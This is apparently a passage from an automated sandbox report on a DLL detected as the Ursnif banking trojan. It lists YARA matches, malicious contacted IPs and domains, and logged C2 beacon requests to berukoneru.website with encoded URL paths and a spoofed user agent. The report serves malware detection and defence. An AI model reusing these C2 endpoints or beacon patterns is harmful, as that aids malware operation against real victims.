Source: Yara match	File source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6424, type: MEMORYSTR

Remote Access Functionality:

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.482158894.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.363790330.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6424, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
79.110.52.144	berukoneru.website	Romania	60233	V4ESCROW-ASRO	true
18.219.227.107	prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com	United States	16509	AMAZON-02US	false
3.12.124.139	unknown	United States	16509	AMAZON-02US	true

Private

IP
192.168.2.1

Contacted Domains

Name	IP	Active
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com	18.219.227.107	true
berukoneru.website	79.110.52.144	true
windows.update3.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://berukoneru.website/tire/cFJsSWAGWE/z2qui_2Bz1BNPPVC8/40cjfJwuY_2F/qeMRrcIZBVG/Ne0YpnkwEJfIh3/f5okxbrq_2FXxzqJmpSlY/lBFuBWEAi70a61Vy/5QzGUBrPY97n5jQ/Uty84umyFnIA829ewc/61TtijfTY/zF0ZOoxI3N5pWHzggULR/QMXY_2F7FMDggc4thO7/G_2BQV4WNp08p5XmI0/TT.eta	true	Avira URL Cloud: safe	unknown
https://berukoneru.website/tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL/QVPhPbWeSwRVFSzMJ6Vcg/Y9VyT4fbhoZ82vwq/2GIivBsbax9rQUh/n7Uc5KQo0J8ysVLUlr/XSTAmgKJY/zcSJprSz5_2F2B_2Bsbt/2juDsOXqzjP5XLZ_2FP/WpBTOnAHWcoi3w7ov9P0p8/2Wzq8vdJF/5Vrog3ES/Q.eta	true	Avira URL Cloud: safe	unknown
https://berukoneru.website/tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9onw/Df8mv9bGmzrCq_2BDh/Avhzr_2BW/zhUOFRSj_2Brp9dFi25e/XIimtsTVgbS8Ddk4Jlg/q7ifDAWTLXmxh8fPSAYnUc/3K8xDlQvgKVYD/9E1TEXJC/aPKjFJSRgVkfUwKBYWKDgLh/VONwiC9wK5/3CPG7RAhZST/_2FDfWf.eta	true	Avira URL Cloud: safe	unknown
https://berukoneru.website/tire/9IgUYNG9/P9N8jGg62VAhbwmUeolHFCg/K1HN9iUPdi/an2HdiNP_2FRIROSF/l9uR7XFSquKc/cTL90RaThvy/4LigE_2BC67Pa2/OL_2Fq6LzSFfAjBrcF1my/5AUpi_2BYfx15AAS/Ho8688ZDo7zPK6r/e_2F4ZPz87sJSle6kT/I1gJ4hikp/cCibgdVeBM9n2ccXEO18/D4MJBqmD.eta	true	Avira URL Cloud: safe	unknown
https://berukoneru.website/tire/4rLoqSurzyu0/faIn56YEFho/0rtfGJwOQq2F5c/BJoAXiIiU_2F9ZRU2hBse/gAViRvyFsSwGVefa/kRvG3X29VJojGH9/HHkJOTdVe7Nqn26zmq/y4GSGdPZu/kOhHaVJwE10tGTyVEPor/Cm7rt8Rg13eBm6Sc7Sm/5BVZ_2BPytM06u32e6Y8Q1/6dRgyXIz2yrBpW/dgW2i.eta	true	Avira URL Cloud: safe	unknown
https://berukoneru.website/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/659nN8frXqL/KI_2BmGQcF3l8a/UPJEdWRElF2Ck7h3GrI7f/Jn4UaIHKOCKly3pR/5WtUgfhtCob3WA8/8RFl0SkPd8NK0tapfV/Bv03ARxcw/T6wxTs3S_2BFMRgrZw2Q/_2BV_2F7vXjmj/i.eta	true	Avira URL Cloud: safe	unknown
https://berukoneru.website/tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHYA4xvaox/Zos6wfhvU6Vx/dZ_2FhTkVUm/dQ1eWiBdVQx_2F/3MQ4AfN6CRhAz7ojdkAuB/vyHN6D_2BnDaccRD/rxLm6HRGflkJaqH/HtsgyaJ8NMuefJHJTr/vf407nMOm/3YNEpWUoxMPlA61ciEA5/ZB4w8oLbC0y/cC.eta	true	Avira URL Cloud: safe	unknown

AV Detection:

Found malware configuration

Source: 00000004.00000002.913785412.0000000000D60000.00000040.00000001.sdmp

Machine Learning detection for sample

Source: 6.dll

Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files

Source: 6.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49796 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49798 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49802 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49808 version: TLS 1.2

Source:	Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.452232416.0000000004AA0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.431445543.0000000006530000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.427791226.0000000005CD0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.437889471.0000000006160000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.452232416.0000000004AA0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.431445543.0000000006530000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.427791226.0000000005CD0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.437889471.0000000006160000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.pdb561934e089 source: powershell.exe, 00000019.00000003.455310412.00000254DC7BD000.00000004.00000001.sdmp

Networking:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: berukoneru.website
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 79.110.52.144 187	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: windows.update3.com
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 18.219.227.107 187	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 3.12.124.139 187	Jump to behavior

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: V4ESCROW-ASRO V4ESCROW-ASRO

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: ce5f3254611a8c095a3d821d44539877

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9onw/Df8mv9bGmzrCq_2BDh/Avhzr_2BW/zhUOFRSj_2Brp9dFi25e/XIimtsTVgbS8Ddk4Jlg/q7ifDAWTLXmxh8fPSAYnUc/3K8xDlQvgKVYD/9E1TEXJC/aPKjFJSRgVkfUwKBYWKDgLh/VONwiC9wK5/3CPG7RAhZST/_2FDfWf.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHYA4xvaox/Zos6wfhvU6Vx/dZ_2FhTkVUm/dQ1eWiBdVQx_2F/3MQ4AfN6CRhAz7ojdkAuB/vyHN6D_2BnDaccRD/rxLm6HRGflkJaqH/HtsgyaJ8NMuefJHJTr/vf407nMOm/3YNEpWUoxMPlA61ciEA5/ZB4w8oLbC0y/cC.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/fGFKjH5BjbdZz4tmUO5m/ZAUfPXxElw8Dkm9Cfh9/xqmrK6ieQrOr54I1y1Md2B/CJZjvCZRXK_2B/c6YLK40A/ibGCXB5z8qRJaf9iUFEBazW/9sEXIVndb3/DsRsV2z8TCrjx7mBI/rTZxp021lQBU/ESMggS1gJ_2/Bi3Bcj9_2B8Xf4/Xr9j2PgVhY9_2FzIeDatB/WE3DM_2B4ZBLmr9g/bExshi993/JbJC0wJJ/U.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/cFJsSWAGWE/z2qui_2Bz1BNPPVC8/40cjfJwuY_2F/qeMRrcIZBVG/Ne0YpnkwEJfIh3/f5okxbrq_2FXxzqJmpSlY/lBFuBWEAi70a61Vy/5QzGUBrPY97n5jQ/Uty84umyFnIA829ewc/61TtijfTY/zF0ZOoxI3N5pWHzggULR/QMXY_2F7FMDggc4thO7/G_2BQV4WNp08p5XmI0/TT.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/659nN8frXqL/KI_2BmGQcF3l8a/UPJEdWRElF2Ck7h3GrI7f/Jn4UaIHKOCKly3pR/5WtUgfhtCob3WA8/8RFl0SkPd8NK0tapfV/Bv03ARxcw/T6wxTs3S_2BFMRgrZw2Q/_2BV_2F7vXjmj/i.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/9IgUYNG9/P9N8jGg62VAhbwmUeolHFCg/K1HN9iUPdi/an2HdiNP_2FRIROSF/l9uR7XFSquKc/cTL90RaThvy/4LigE_2BC67Pa2/OL_2Fq6LzSFfAjBrcF1my/5AUpi_2BYfx15AAS/Ho8688ZDo7zPK6r/e_2F4ZPz87sJSle6kT/I1gJ4hikp/cCibgdVeBM9n2ccXEO18/D4MJBqmD.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/iH0556GjtiGQk4lyd6/e4eJ66Hyx/L2n2id7yGxzkaZSAZenq/25xy0D1xFkintWrbCAo/f_2Bdm0MJPWq7ugWEYUqSU/PtgL_2FeeZv0h/UCRQYI_2/FefNYP32vk23pbK3jV8vqXP/0Ovr3EWUID/eiKH_2Fkr5cf0tXqX/_2BscW0pxtbY/lmzrmCcsUPq/Hp_2BA_2BliXkb/fgGnQnQH8/_2B.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/SxP522LQqV7N0J/d6o3ODGgGiBAGfgE9kDAi/iJ3hZ0ExIl8p4ocR/5jXJfG8mFLCjP71/7NSaKdzhGeEI1UdiPa/8FnVHvkbS/kpLNStxRjAnliuJ5EZNG/gq3G4NvVU_2BCUhovI0/u7jwUo5n_2BL68IOoZxv34/oRctSCfqONUBa/hRxyIlRY/aB2W4yGH6sVrPB1xJM1YXlq/jJC_2B1iv6kvD5/bMsiwtIS.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL/QVPhPbWeSwRVFSzMJ6Vcg/Y9VyT4fbhoZ82vwq/2GIivBsbax9rQUh/n7Uc5KQo0J8ysVLUlr/XSTAmgKJY/zcSJprSz5_2F2B_2Bsbt/2juDsOXqzjP5XLZ_2FP/WpBTOnAHWcoi3w7ov9P0p8/2Wzq8vdJF/5Vrog3ES/Q.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/4rLoqSurzyu0/faIn56YEFho/0rtfGJwOQq2F5c/BJoAXiIiU_2F9ZRU2hBse/gAViRvyFsSwGVefa/kRvG3X29VJojGH9/HHkJOTdVe7Nqn26zmq/y4GSGdPZu/kOhHaVJwE10tGTyVEPor/Cm7rt8Rg13eBm6Sc7Sm/5BVZ_2BPytM06u32e6Y8Q1/6dRgyXIz2yrBpW/dgW2i.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/o4Wh2yGKlAclIXiSKni/E2GRbJwAfyjZDLvIiDUTZP/MYjyQpBnAiuxp/RCS8IZuc/T6rd9RjJyTuIO59AdkBUbyh/AeLhgjzVcK/R628sGYn00PGPEGL1/qe_2FhyY_2B4/KAdwjy0pLGn/wY1nXPl9lZfHBx/mKriUsf47w97_2F05n24c/_2B3uV0T1ULXF_2F/rws1Po8g_2B5W/rqgHz.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/gAFUHu83b7fr5ftbr5O9tX/NNJYheBEZ_2Bt/wXhf6hyZ/iBEWHVb19RFKuDukD6ImzPG/nqeMvnB_2B/0lgxK72Q_2BWOlTx_/2BHVUq8DywzL/dSOEptmJdkD/639IuGSCq9GXlR/PUHxRfZnx0Of7xPsoVOC_/2FTMAnj0YKLpX9By/omZGYbxoocAN6vP/PuGPVsc2wwxbBsmHOU/YqsK1vpPn/dCIkRouQqQLmE/5L.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443

Source: 6.dll	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 6.dll	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: loaddll32.exe, 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: 6.dll	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
Source: loaddll32.exe, 00000000.00000003.522936760.0000000001341000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.317739016.0000000001341000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.686994186.0000000001344000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.372896811.0000000001341000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.337960981.0000000003382000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.316290862.0000000003383000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.361019833.0000000003383000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362934990.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362827191.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.522837424.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.364485968.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.338394833.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.397630801.000001497A51A000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.400300965.000001497A51A000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.400801988.000001497A51A000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 6.dll	String found in binary or memory: http://crl.globalsign.net/root.crl0
Source: 6.dll	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: 6.dll	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: 6.dll	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 6.dll	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: loaddll32.exe, 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: 6.dll	String found in binary or memory: http://ocsp.digicert.com0C
Source: 6.dll	String found in binary or memory: http://ocsp.digicert.com0N
Source: powershell.exe, 00000018.00000003.396802391.000001497A5C1000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: 6.dll	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
Source: powershell.exe, 00000018.00000003.396802391.000001497A5C1000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: loaddll32.exe, 00000000.00000003.317582164.000000000139F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.317644552.00000000013B1000.00000004.00000001.sdmp	String found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
Source: loaddll32.exe, 00000000.00000003.317624845.0000000001398000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.316267329.00000000033D1000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.316701420.00000000008F1000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.316654509.0000000000FFE000.00000004.00000001.sdmp	String found in binary or memory: https://aka.ms/MicrosoftEdgeDownload"
Source: rundll32.exe, 00000004.00000003.338607112.0000000000FF3000.00000004.00000001.sdmp	String found in binary or memory: https://assets.onestore.ms/cdnfiles/onestorerolling-1605-16000/shell/common/respond-proxy.html
Source: rundll32.exe, 00000003.00000003.364039010.00000000008D7000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.372813489.00000000008D7000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.523369955.00000000008D7000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.914075643.0000000000F3A000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000003.364485968.0000000000F9E000.00000004.00000001.sdmp	String found in binary or memory: https://berukoneru.website/
Source: regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372837778.00000000033C0000.00000004.00000001.sdmp	String found in binary or memory: https://berukoneru.website/BS
Source: rundll32.exe, 00000004.00000002.914075643.0000000000F3A000.00000004.00000020.sdmp	String found in binary or memory: https://berukoneru.website/LAp
